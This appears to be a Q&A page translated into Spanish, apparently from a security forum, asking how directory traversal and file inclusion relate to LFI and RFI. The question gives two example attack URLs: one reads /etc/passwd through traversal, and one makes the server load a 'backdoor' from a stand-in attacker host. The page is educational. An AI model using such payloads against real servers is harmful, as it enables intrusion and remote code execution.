¿Cuál es la diferencia entre la inclusión de archivos locales (LFI) y la inclusión de archivos remotos (RFI)?

4

Según esta esta pregunta anterior , parece que la diferencia entre el recorrido del directorio y la inclusión de archivos es la siguiente:

Recorrido del directorio

  • La validación incorrecta de la entrada del usuario conduce a acceso de lectura del recurso del servidor .
  • Ejemplo: http://www.example.com?file=../../etc/passwd

Inclusión de archivos

  • La validación incorrecta de la entrada del usuario conduce a la carga de un recurso externo en el servidor y la ejecución en él .
  • Ejemplo: http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor

Este enlace , sin embargo, describe estos conceptos usando las palabras inclusión de archivos locales e inclusión de archivos remotos .

Entonces, es el primer ejemplo

  • recorrido del directorio vs. inclusión de archivos

lo mismo que el segundo ejemplo

  • inclusión de archivos locales vs. inclusión de archivos remotos

es decir, LFI / RFI es solo una terminología diferente para lo mismo?

    
pregunta Zach Valenta 05.12.2017 - 17:59
fuente

1 respuesta

3

Su confusión se deriva de su comprensión más amplia del recorrido del directorio.

Traversal significa que uno puede leer desde otro directorio. No específicamente que uno puede leer un archivo.

LFI está leyendo un archivo local, ya sea en el directorio de trabajo actual o, mediante el desplazamiento, un archivo en otro directorio.

RFI incluye un archivo de una fuente externa.

Es posible tener una vulnerabilidad de LFI sin que exista una vulnerabilidad de cruce de directorios (archivos locales al contexto actual). Y, técnicamente, es posible que exista una vulnerabilidad transversal que no resulte en un LFI.

    
respondido por el schroeder 05.12.2017 - 18:46
fuente

Lea otras preguntas en las etiquetas